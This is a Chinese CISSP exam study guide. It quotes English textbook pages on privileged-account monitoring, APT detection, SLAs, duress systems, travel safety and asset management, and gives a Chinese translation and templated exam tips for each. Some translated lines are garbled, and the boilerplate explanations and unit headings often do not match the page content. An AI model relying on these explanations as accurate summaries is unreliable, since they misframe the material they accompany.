学习单元 09 / PDF P1095

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

On a more basic level, privileged account management monitors actions taken by privileged accounts. This includes creating new user accounts, adding new routes to a routing table, altering the configuration of a firewall, and accessing system log and audit files. Monitoring ensures that users granted these privileges do not abuse them. Monitoring special privileges is combined with other basic principles, such as least privilege and segregation of duties and responsibilities. Principles such as least privilege and segregation of duties help prevent security policy violations, and monitoring helps to deter and detect any violations that occur despite the use of preventive controls.

Employees filling these privileged roles are usually trusted employees. However, there are many reasons why an employee can change from a trusted employee to a disgruntled employee or malicious insider. Reasons that can change a trusted employee's behavior can be as simple as a lowerthan-expected bonus, a negative performance review, or just a personal grudge against another employee. However, by monitoring usage of special privileges, an organization can deter an employee from misusing the privileges and detect the action if a trusted employee does misuse them. Many automated tools are available that can monitor the usage of special privileges.

When an administrator or privileged operator performs one of these activities, the tool can log the event and send an alert. Additionally, access review audits detect misuse of these privileges. For example, many attackers use PowerShell scripts to escalate their privileges. By configuring a security information and event management (SIEM) system to detect and send alerts on certain events, it's possible to detect the use of malicious PowerShell scripts. There's more to this than just looking for specific Event IDs (such as Event ID 4104). After modifying registry entries, the SIEM can also record an entire PowerShell script and look for commands that attackers commonly use.

Chapter 17, “Preventing and Responding to Incidents,” covers SIEM systems in more depth.

中文直译 / 整理

在更基础的层面上,特权账户管理会监控特权账户执行的操作。 这包括创建 新用户账户、向路由表添加新路由、更改防火墙配置以及访问系统日志和审 计文件。 监控可确保被授予这些权限的用户不会滥用它们。 对特殊权限的监控与其他基本原理相结合,例如最小权限原则和职 责分离。 最小权限原则和职责分离有助于防止安全策略违规,而监控则 有助于威慑并检测即使在使用预防性控制措施后仍发生的任何违规行为。 担任这些特权角色的员工通常是值得信赖的员工。 然而,员工从值得信赖的 员工转变为不满的员工或恶意内部人员的原因有很多。 可能导致值得信赖的 员工行为改变的原因可能很简单,例如奖金低于预期、负面绩效评估,或仅 仅是与其他员工的个人恩怨。 然而,通过监控特殊权限的使用,组织可以阻 止员工滥用权限,并在值得信赖的员工确实滥用时检测到该行为。 有许多自动化工具可用于监控特殊权限的使用。 当管理员或特权操作员执 行这些活动之一时,工具可以记录该事件并发送警报。 此外,访问审查审 计可检测这些权限的滥用行为。 例如,许多攻击者使用 PowerShell 脚本来提升其权限。

通过配置安全信息和 事件管理(SIEM)系统来检测特定事件并发送警报,可以检测到恶意 PowerShell 脚本的使用。 这不仅仅是查找特定事件 ID(例如事件 ID 4104)。 在修改注册表项后,SIEM 还可以记录整个 PowerShell 脚本,并查找攻击者 常用的命令。 第 17 章“预防和响应事件”更深入地介绍了 SIEM 系统。

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

NIST:NIST 提供美国常用安全标准、框架和指南。

政策:政策是高层原则,说明必须遵守什么。

防火墙:防火墙根据规则控制网络流量进出。

入侵检测系统 IDS:IDS 负责发现可疑行为并告警,一般不直接阻断。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

Policy 高层、强制、稳定;Procedure 具体步骤。

防火墙不是万能;它常与 IDS/IPS、分段、日志一起使用。

检测是 IDS,主动阻断更像 IPS。

审计题关注独立性、证据、范围和报告。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
NIST NIST 提供美国常用安全标准、框架和指南。
政策 政策是高层原则,说明必须遵守什么。
防火墙 防火墙根据规则控制网络流量进出。
入侵检测系统 IDS IDS 负责发现可疑行为并告警,一般不直接阻断。
审计 审计检查控制是否存在、是否有效、是否符合要求。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 10 / PDF P1096

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

Detecting APTs Monitoring the use of elevated privileges can also detect advanced persistent threat (APT) activities. For example, the U.S. Department of Homeland Security (DHS) and the Federal Bureau of Investigation (FBI) released a technical alert (TA17-239A) describing the activities of an APT targeting energy, nuclear, water, aviation, and some critical manufacturing sectors, along with some government entities. The alert details how attackers infected a single system with a malicious phishing email or by exploiting server vulnerabilities.

Once they exploited a single system, they escalated their privileges and began performing many common privileged operations, including the following: Accessing and deleting logs Creating and manipulating accounts (such as adding new accounts to the Administrators group) Controlling communication paths (such as opening port 3389 to enable the Remote Desktop Protocol and/or disabling the host firewall) Running various scripts (including PowerShell, batch, and JavaScript files) Creating and scheduling tasks (such as one that logged their accounts out after 8 hours to mimic the behavior of a regular user) Monitoring common privileged operations can detect these activities early in the attack.

In contrast, if the actions go undetected, the APT can remain embedded in the network for years. Service-Level Agreements (SLAs) A service-level agreement (SLA) is an agreement between an organization and an outside entity, such as a vendor. The SLA stipulates performance expectations and often includes penalties if the vendor doesn't meet these expectations. As an example, many organizations use cloud-based services to rent servers. A vendor provides access to the servers and maintains them to ensure that

中文直译 / 整理

检测高级持续性威胁( APT) 监控提升权限的使用情况还可以检测高级持续性威胁(APT)活动。 例如, 美国国土安全部(DHS)和联邦调查局(FBI)发布了一份技术警报( TA17‑239A),描述了针对能源、核能、水务、航空和部分关键制造行业, 以及一些政府机构的 APT 活动。 该警报详细说明了攻击者如何通过恶意钓鱼邮件或利用服务器漏洞感染单 个系统。 一旦他们成功入侵单个系统,便会提升权限并开始执行多种常见 的特权操作,包括以下内容: 访问和删除日志 创建和操控账户(例如将新账户添加到管理员组) 控制通信路径(例如开放端口3389以启用远程桌面协议,和/或禁 用主机防火墙) 运行各种脚本(包括PowerShell、批处理和JavaScript 文件) 创建和安排任务(例如,每8小时自动登出账户以模拟普通用户的行为) 监控常见的特权操作可以及早发现这些活动。 相反,如果这些行为未被发 现,高级持续性威胁(APT)可能在网络中潜伏数年。 服务级别协议(SLA) 服务级别协议(SLA)是组织与外部实体(如供应商)之间的协议。 SLA规定了 性能期望,并通常包含供应商未能达到这些期望时的处罚条款。

例如,许多组织使用基于云的服务来租用服务器。 供应商提供服务器访问权限并 维护服务器,以确保

小白解释

场景先行:员工在家访问公司系统,流量要穿过家庭网络、互联网、防火墙、VPN、服务器。网络安全题就是让你判断问题发生在哪一层、用哪个控制放在什么位置。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:不分层就会乱选设备:该加密的地方装防火墙,该监测的地方却只做访问控制。

你作为负责人可以这样想:先定位网络层次,再决定是分段、过滤、加密、检测还是阻断。

本页术语用人话说:

NIST:NIST 提供美国常用安全标准、框架和指南。

防火墙:防火墙根据规则控制网络流量进出。

日志:日志记录系统和用户活动,用于监控、审计和调查。

常见误区:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

读完后用一句话复述:如果我是网络安全工程师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是网络安全工程师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

防火墙不是万能;它常与 IDS/IPS、分段、日志一起使用。

日志要保护完整性、时间同步和访问控制。

排除法提醒:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

本页术语拆解
NIST NIST 提供美国常用安全标准、框架和指南。
防火墙 防火墙根据规则控制网络流量进出。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 11 / PDF P1097

可用性:需要时能用,且性能可接受

可用性关注中断、故障、DoS、备份和冗余。

教材原文段落

they are available. The organization can use an SLA to specify availability, such as with uptimes and downtimes. With this in mind, an organization should have a clear idea of their requirements when working with third parties and ensure that the SLA includes these requirements. In addition to an SLA, organizations sometimes use a memorandum of understanding (MOU). MOUs document the intention of two entities to work together toward a common goal. Although a MOU is similar to an SLA, it is less formal and doesn't include any monetary penalties if one of the parties doesn't meet its responsibilities.

Address Personnel Safety and Security Personnel safety concerns are an essential element of security operations. It's possible to replace things such as data, servers, and even entire buildings. In contrast, it isn't possible to replace people. With that in mind, organizations should implement security controls that enhance personnel safety. As an example, consider the exit door in a data center controlled by a pushbutton electronic cipher lock. If a fire results in a power outage, does the exit door automatically unlock or remain locked?

An organization that values assets in the server room more than personnel safety might decide to ensure that the door remains locked when power isn't available. Doing so protects the physical assets in the data center, but it also risks the lives of personnel within the room because they won't be able to easily exit the room. In contrast, an organization that values personnel safety over the data center's assets will ensure that the locks unlock the exit door when power is lost. Duress Duress systems are useful when personnel are working alone. For example, a single guard might be guarding a building after hours.

If a group of people break into the building, the guard probably can't stop them on their own. However, a guard can raise an alarm with a duress system. A simple duress system is just a button that sends a distress call. A monitoring entity receives the distress call and responds based on established procedures. The monitoring entity could initiate a phone call or text message back to the person who sent the distress call. In this example, the guard responds by confirming the situation.

中文直译 / 整理

服务器可用。 组织可以使用服务等级协议(SLA)来规定可用性,例如正 常运行时间和停机时间。 鉴于此,组织在与第三方合作时应明确自身需求, 并确保SLA包含这些要求。 除了服务等级协议(SLA)外,组织有时还会使用谅解备忘录(MOU)。 MOU 记录了两个实体为实现共同目标而合作的意向。 尽管 MOU 与 SLA 类似, 但它更为非正式,且不包含任何一方未履行责任时的经济处罚条款。 保障人员安全与安保 人员安全问题是安全运营的基本要素。 数据、服务器甚至整个建筑物都可以被 替换,但人员却无法被替代。 因此,组织应实施增强人员安全性的安全控制措 施。 以数据中心的出口门为例,该门由一个按钮式电子密码锁控制。 如果发生火灾 导致断电,出口门是否会自动解锁,还是会保持锁定? 如果一个组织更重视服 务器室内的资产而非人员安全,它可能会决定在断电时保持门锁闭,以此保护 数据中心的物理资产,但这也可能危及室内人员的生命安全,因为他们将无法 轻易逃生。 相反,如果一个组织更重视人员安全而非数据中心的资产,它将确 保在断电时锁具自动解锁,使出口门可以打开。 胁迫 胁迫系统在人员单独工作时非常有用。

例如,一名单独的警卫可能在非工作时 间值守一栋建筑。 如果一群闯入者进入该建筑,警卫很可能无法独自阻止他们。 然而,警卫可以通过胁迫系统发出警报。 一个简单的胁迫系统只是一个发送求 救信号的按钮。 监控实体接收到求救信号后,会根据既定程序作出响应。 监控 实体可以向发送求救信号的人员回拨电话或发送短信。 在此示例中,警卫通过 确认情况作出回应。

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:可用性关注中断、故障、DoS、备份和冗余。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

可用性:可用性保证授权用户需要时能及时使用系统和数据。

程序:程序是一步一步怎么做。

资产:资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“可用性:需要时能用,且性能可接受”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

冗余、备份、BCP/DRP、抗 DoS、容量规划都对应可用性。

Step-by-step、SOP 常对应 procedure。

资产安全题先问资产是谁拥有、如何分类、谁负责保护。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
可用性 可用性保证授权用户需要时能及时使用系统和数据。
程序 程序是一步一步怎么做。
资产 资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。
学习单元 12 / PDF P1098

保护机制:分层、隐藏、加密和边界

单一控制不够,安全靠多个机制配合。

教材原文段落

Security systems often include code words or phrases that personnel use to verify that everything truly is okay or verify that there is a problem. For example, a code phrase indicating everything is okay could be “Everything is awesome.” If a guard inadvertently activated the duress system and the monitoring entity responded, the guard says, “Everything is awesome” and then explains what happened. However, if criminals apprehended the guard, the guard could skip the phrase and instead make up a story of how the duress system was accidentally activated. The monitoring entity would recognize that the guard skipped the code phrase and send help.

Some electronic cipher locks support two or more codes, such as one for regular use and one to raise an alarm. Normally, employees would enter a code (such as 1 2 3 4) to open the door to a secure area. In a duress situation, they could enter a different code (such as 5 6 7 8) that would open the door and set off a silent alarm. Travel Another safety concern is when employees travel because criminals might target an organization's employees while they are traveling. Training personnel on safe practices while traveling can enhance their safety and prevent security incidents. This includes simple things such as verifying a person's identity before opening the hotel door.

If room service is delivering complimentary food, a call to the front desk can verify if this is valid or part of a scam. Employees should also be warned about the many risks associated with electronic devices (such as smartphones, tablets, and laptops) when traveling. These risks include the following: Sensitive Data Ideally, the devices should not contain any sensitive data. This prevents the loss of data if the devices are lost or stolen. If an employee needs this data while traveling, it should be protected with strong encryption. Malware and Monitoring Devices There have been many reported cases of malware being installed on systems while employees were visiting a foreign country.

Similarly, we have heard firsthand accounts of physical monitoring devices being installed inside devices after a trip to a foreign country. People might think their devices are safe in a hotel room as they go out to a local restaurant. However, this is more than enough time for someone who otherwise looks like hotel staff to enter your room, install malware in the operating system, and install a physical listening device inside

中文直译 / 整理

安全系统通常包含一些密码词或短语,供人员使用以验证一切是否确实正常或 是否存在异常。 例如,表示一切正常的密码短语可能是“一切都很棒”。 如果 警卫误触了胁迫系统,而监控实体作出响应,警卫可以说“一切都很棒”,然 后解释发生了什么。 然而,如果罪犯控制了警卫,警卫可能会跳过该短语,转 而编造一个胁迫系统被误激活的故事。 监控实体会识别出警卫跳过了密码短语, 并派遣援助。 一些电子密码锁支持两个或更多密码,例如一个用于日常使用,另一个用于报 警。 通常,员工会输入一个密码(例如 1 2 3 4)以打开通往安全区域的门。 在 胁迫情况下,他们可以输入另一个密码(例如 5 6 7 8),该密码既能开门,又 能触发无声报警。 旅行 另一个安全问题是员工出差时,罪犯可能会针对正在出差的组织员工。 通过培 训员工掌握出差期间的安全措施,可以增强其安全性并防止安全事件发生。 这 包括一些简单的做法,例如在打开酒店房门之前核实对方身份。 如果客房服务 送来免费餐食,可致电前台确认此服务是否真实,还是骗局的一部分。 还应提醒员工注意出差时电子设备(如智能手机、平板电脑和笔记本电脑)所 面临的诸多风险。

这些风险包括以下几点: 敏感数据理想情况下,设备不应包含任何敏感数据。 这样可以防止设备丢失或 被盗时数据泄露。 如果员工出差时需要这些数据,应使用强加密进行保护。 恶意软件和监控设备 已经有许多报告称,员工在访问外国时,其系统被安装了恶 意软件。 同样,我们也收到 firsthand 的报告,称在前往外国旅行后,设备内部 被安装了物理监控设备。 人们可能认为,当他们外出到当地餐厅时,设备在酒店 房间内是安全的。 然而,这已经足够让一个看起来像酒店工作人员的人进入您的 房间,在操作系统中安装恶意软件,并在内部安装物理窃听设备

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:单一控制不够,安全靠多个机制配合。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

加密:加密把内容变成未授权者看不懂的形式。

身份:身份是主体在系统中的标识。

恶意代码:恶意代码包括病毒、蠕虫、木马、勒索软件等。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“保护机制:分层、隐藏、加密和边界”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

身份管理题要区分识别、认证、授权、审计。

防恶意代码要结合补丁、最小权限、检测、备份和用户培训。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
加密 加密把内容变成未授权者看不懂的形式。
身份 身份是主体在系统中的标识。
恶意代码 恶意代码包括病毒、蠕虫、木马、勒索软件等。
学习单元 13 / PDF P1099

政策、标准、程序、指南

高层原则、最低要求、操作步骤、建议做法要分清。

教材原文段落

the computer. Maintaining physical control of devices at all times can prevent these attacks. Additionally, security experts recommend that employees do not bring their personal devices but instead bring temporary devices to be used during the trip. After the trip, these can be wiped clean and reimaged. Free Wi-Fi Free Wi-Fi often sounds appealing while traveling. However, it can easily be a trap configured to capture all the user's traffic. As an example, attackers can configure a Wi-Fi connection as an on-path attack, forcing all traffic to go through the attacker's system. The attacker can then capture all traffic.

A sophisticated on-path attack (sometimes called a man-in-the-middle attack) can create an HTTPS connection between the client and the attacker's system and create another HTTPS connection between the attacker's system and an internet-based server. From the client's perspective, it looks like it is a secure HTTPS connection between the client's computer and the Internetbased server. However, all the data is decrypted and easily viewable on the attacker's system. Instead, users should have a method of creating their own internet connection, such as through a smartphone or with a mobile wireless hotspot device.

VPNs Employers should have access to virtual private networks (VPNs) that they can use to create secure connections. These can be used to access resources in the internal network, including their work-related email. Emergency Management Emergency management plans and practices help an organization address personnel safety and security after a disaster.

Disasters can be natural (such as hurricanes, tornadoes, or earthquakes) or the result of people's actions (such as fires, terrorist attacks, or cyberattacks causing massive power outages), as discussed in Chapter 18, “Disaster Recovery Planning.” Organizations will have different plans depending on the types of natural disasters they are likely to experience. The safety of personnel should be a primary consideration during any disaster. Security Training and Awareness Chapter 2, “Personnel Security and Risk Management Concepts,” covered security training and awareness programs in greater depth.

If an organization has a training and awareness program in place, it's relatively easy to add personnel safety and security topics. These programs help ensure that

中文直译 / 整理

计算机。 始终对设备保持物理控制可以防止这些攻击。 此外,安全专家建议员 工不要携带个人设备,而应携带专为旅行使用的临时设备。 旅行结束后,这些 设备可以被彻底清除并重新镜像。 免费Wi‑Fi 免费Wi‑Fi在旅行时听起来很有吸引力。 然而,它很容易成为一种陷 阱,被配置为捕获所有用户流量。 例如,攻击者可以将Wi‑Fi连接配置为中间人 攻击,迫使所有流量通过攻击者的系统。 攻击者随后可以捕获所有流量。 一种复 杂的中间人攻击(有时称为中间人攻击)可以在客户端与攻击者系统之间建立 HTTPS连接,并在攻击者系统与基于互联网的服务器之间创建另一个HTTPS连 接。 从客户端的角度看,这看起来像是客户端计算机与基于互联网的服务器之间 的安全HTTPS连接。 然而,所有数据在攻击者的系统上被解密并轻松查看。 相 反,用户应具备创建自己互联网连接的方法,例如通过智能手机或移动无线热点 设备。 VPN 雇主应能够使用虚拟专用网络(VPN)来建立安全连接。 这些网络可用 于访问内部网络中的资源,包括与工作相关的电子邮件。 应急管理 应急管理 计划和措施有助于组织在灾难发生后保障人员的安全与安保。

灾难 可能是自然的(如飓风、龙卷风或地震),也可能是人为造成的(如火灾、 恐怖袭击或导致大规模停电的网络攻击),如 第18章“灾难恢复计划”中所 述。 组织将根据其可能遭遇的自然灾害类型制定不同的计划。 在任何灾难中, 人员安全都应是首要考虑因素。 安全培训与意识 第2章,“人员安全与风险管理概念”更深入地介绍了安全培训和意识计划。 如果一个组织已经实施了培训和意识计划,那么添加人员安全和安保主题就相 对容易。 这些计划有助于确保

小白解释

场景先行:员工在家访问公司系统,流量要穿过家庭网络、互联网、防火墙、VPN、服务器。网络安全题就是让你判断问题发生在哪一层、用哪个控制放在什么位置。

这一页真正想让你理解的是:高层原则、最低要求、操作步骤、建议做法要分清。

把它放进公司里看,关键不是背定义,而是判断:不分层就会乱选设备:该加密的地方装防火墙,该监测的地方却只做访问控制。

你作为负责人可以这样想:先定位网络层次,再决定是分段、过滤、加密、检测还是阻断。

本页术语用人话说:

虚拟专用网络 VPN:VPN 在不可信网络上建立加密隧道。

常见误区:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

读完后用一句话复述:如果我是网络安全工程师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“政策、标准、程序、指南”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是网络安全工程师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

远程访问、站点到站点、安全隧道常对应 VPN/IPSec。

排除法提醒:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

本页术语拆解
虚拟专用网络 VPN VPN 在不可信网络上建立加密隧道。
学习单元 14 / PDF P1100

认证:证明身份

认证回答“你是不是你声称的那个人”。

教材原文段落

personnel are aware of duress systems, travel best practices, emergency management plans, and general safety and security best practices. When addressing personnel safety and security, training programs should stress the importance of protecting people. Military warships travel into war zones during times of conflict, putting personnel at risk. However, they also do endless training to protect lives. Organizations rarely face the same level of risk but should still prioritize the value of human lives. Of course, as you learned in Chapter 2, security training and awareness programs should include comprehensive coverage of cybersecurity topics as well.

Some important topics to include are: Insider threat. Educate employees on the risks associated with unauthorized access or misuse of company data by employees, contractors, or business partners. Highlight the signs of potential insider threats and the protocols for reporting suspicious behavior. Social media impacts. Address the risks and vulnerabilities associated with oversharing on social media platforms. Teach employees about potential social engineering attacks that leverage publicly available information and the importance of setting strict privacy settings. Two-factor authentication (2FA) fatigue.

This segment can address the common issue where users become complacent or irritated with 2FA, often trying to bypass or minimize its use. Training should emphasize the importance of 2FA in protecting both personal and organizational data, ways to make 2FA more user-friendly, and the potential consequences of neglecting this security measure. Provision Information and Assets Securely An important consideration when provisioning information and assets securely is asset management. Chapter 13, “Managing Identity and Authentication,” covered provisioning and deprovisioning for accounts as part of the identity and access provisioning life cycle.

This section focuses on hardware, software, and information assets. Information and Asset Ownership Chapter 5, “Protecting Security of Assets,” discussed the importance of identifying and classifying information and assets. It also discussed various

中文直译 / 整理

人员了解胁迫系统、出行最佳实践、应急管理系统以及一般的安全和安保最 佳实践。 在处理人员安全与安保时,培训计划应强调保护人员的重要性。 军事舰艇在 冲突期间进入战区,使人员面临风险。 然而,它们也进行无休止的训练以保 护生命。 组织很少面临相同程度的风险,但仍应优先重视人的生命价值。 当然,正如您在第2章中学到的,安全培训和意识计划还应涵盖网络安全主题 的全面内容。 一些重要的主题包括: 内部威胁。 教育员 ploy与风险相关的 突出潜在内部威胁的迹象以及报告可疑行为的规程。 社交媒体影响。 探讨在社交媒体平台上过度分享所带来的风险与脆弱性。 教导 员工关于 利用公开信息的潜在社会工程攻击,以及设置严格隐私设置的重要性。 双因素认证(2FA)疲劳。 本部分可探讨用户因对2FA产生懈怠或厌烦而 试图绕过或减少其使用的常见问题。 培训应强调2FA在保护个人和组织 数据方面的重要性、使2FA更易用的方法,以及忽视这一安全措施的潜 在后果。 安全 provision 信息和资产 安全 provision 信息和资产时的一个重要考虑因素是资产管理。

第13章“身份 和认证管理”涵盖了身份和访问 provision 生命周期中的账户 provision 和取 消 provision。 本节重点讨论硬件、软件和信息资产。 信息和资产所有权 第五章,“保护资产安全”,讨论了识别和分类信息与资产的重要性。 还讨论了 各种

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:认证回答“你是不是你声称的那个人”。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

认证:认证是验证“你是不是你声称的那个人”。

资产:资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。

入侵防御系统 IPS:IPS 可检测并主动阻断恶意流量。

身份:身份是主体在系统中的标识。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“认证:证明身份”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

密码、令牌、生物特征、多因素认证都服务认证。

资产安全题先问资产是谁拥有、如何分类、谁负责保护。

IPS 放在线路中,误报可能影响可用性。

身份管理题要区分识别、认证、授权、审计。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
认证 认证是验证“你是不是你声称的那个人”。
资产 资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。
入侵防御系统 IPS IPS 可检测并主动阻断恶意流量。
身份 身份是主体在系统中的标识。
学习单元 15 / PDF P1101

角色与职责:谁最终负责,谁执行保护

CISSP 很爱考 owner、custodian、senior manager 的责任边界。

教材原文段落

data roles. As a reminder, the data owner is the person who has ultimate organizational responsibility for the data. This is a senior manager, such as the chief executive officer (CEO), president, or department head. Similarly, senior managers are ultimately responsible for other assets, such as hardware assets. Consider an IT department that manages servers. The IT department owns these servers, and the senior management in the IT department is responsible for protecting them. The key point is that by identifying the assets’ owners, an organization also identifies the individuals responsible for protecting those assets.

Data owners typically delegate data protection tasks to others in the organization. For example, employees in the data custodian security role typically perform daily tasks such as implementing access controls, performing backups, and managing data storage. Asset Management Asset management refers to managing both tangible and intangible assets. This typically starts with inventories of assets, tracking the assets, and taking additional steps to protect them throughout their lifetime. Tangible assets include hardware and software assets owned by the company. Intangible assets include patents, copyrights, a company's reputation, and other assets representing potential revenue.

By managing assets successfully, an organization prevents losses. Many organizations use an automated configuration management system (CMS) to help with hardware asset management. The primary purpose of a CMS is configuration management, discussed later in this chapter. The CMS needs to connect to hardware systems when checking configuration settings. While doing so, it verifies that the system is still on the network and turned on. Hardware Asset Inventories Hardware assets are IT resources such as computers, servers, routers, switches, and peripherals.

Many organizations use databases and inventory applications to perform inventories and track hardware assets through the entire equipment life cycle. For example, bar-code systems are available that can print bar codes to place on equipment. The bar-code database includes relevant details on the hardware, such as the model, serial number, and location. When the hardware is purchased, it is bar-coded before it is

中文直译 / 整理

数据角色。 作为提醒,数据所有者是对数据负有最终组织责任的人。 这是一位 高级管理人员,例如首席执行官(CEO)、总裁或部门主管。 同样,高级管理 人员对其他资产(如硬件资产)负有最终责任。 考虑一个管理服务器的IT部门。 IT部门拥有这些服务器,IT部门的高级管理层负责保护它们。 关键点在于,通过识别资产的所有者,组织也确定了负责保护这些资产的个人。 数据所有者通常将数据保护任务委托给组织内的其他人。 例如,担任数据保管 安全角色的员工通常执行日常任务,如实施访问控制、执行备份和管理数据存 储。 资产管理 资产管理是指管理有形和无形资产。 这通常从资产清点、跟踪资产以及在资产 生命周期内采取额外措施加以保护开始。 有形资产包括公司拥有的硬件和软件资产。 无形资产包括专利、版权、公 司声誉以及其他代表潜在收入的资产。 通过成功管理资产,组织可以防止损失。 许多组织使用自动化配置管理系统(CMS)来协助硬件资产管理。 CMS的主 要目的是配置管理,这将在本章后面讨论。 CMS在检查配置设置时需要连接到 硬件系统。 在此过程中,它会验证系统是否仍在网络上并处于开启状态。

硬件资产清单 硬件资产是计算机、服务器、路由器、交换机和外设等IT资源。 许多组织使用 数据库和库存应用程序来执行盘点,并追踪硬件资产的整个生命周期。 例如, 有条形码系统可以打印条形码并贴在设备上。 条形码数据库包含有关硬件的相 关详细信息,例如型号、序列号和位置。 当硬件采购后,在其

小白解释

场景先行:公司准备上线一个新业务系统,技术团队说可以买设备,法务说要合规,业务说不能影响上线。安全治理就是让高层定方向:安全要服务业务目标,风险由谁接受,预算花在哪里。

这一页真正想让你理解的是:CISSP 很爱考 owner、custodian、senior manager 的责任边界。

把它放进公司里看,关键不是背定义,而是判断:如果没有治理,安全会变成各部门各做各的:有人只想省钱,有人只想堆工具,最后责任不清。

你作为负责人可以这样想:先定策略和责任,再把战略拆成战术计划和日常运营计划。

本页术语用人话说:

高级管理者:高级管理者承担安全最终责任。

数据所有者:数据所有者决定数据分类、保护要求和访问规则。

数据保管者:数据保管者按所有者要求实施备份、访问控制等保护。

程序:程序是一步一步怎么做。

常见误区:不要把治理理解成配置设备;治理是方向、责任和监督。

读完后用一句话复述:如果我是高层管理者 / CISO,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“角色与职责:谁最终负责,谁执行保护”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是高层管理者 / CISO在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

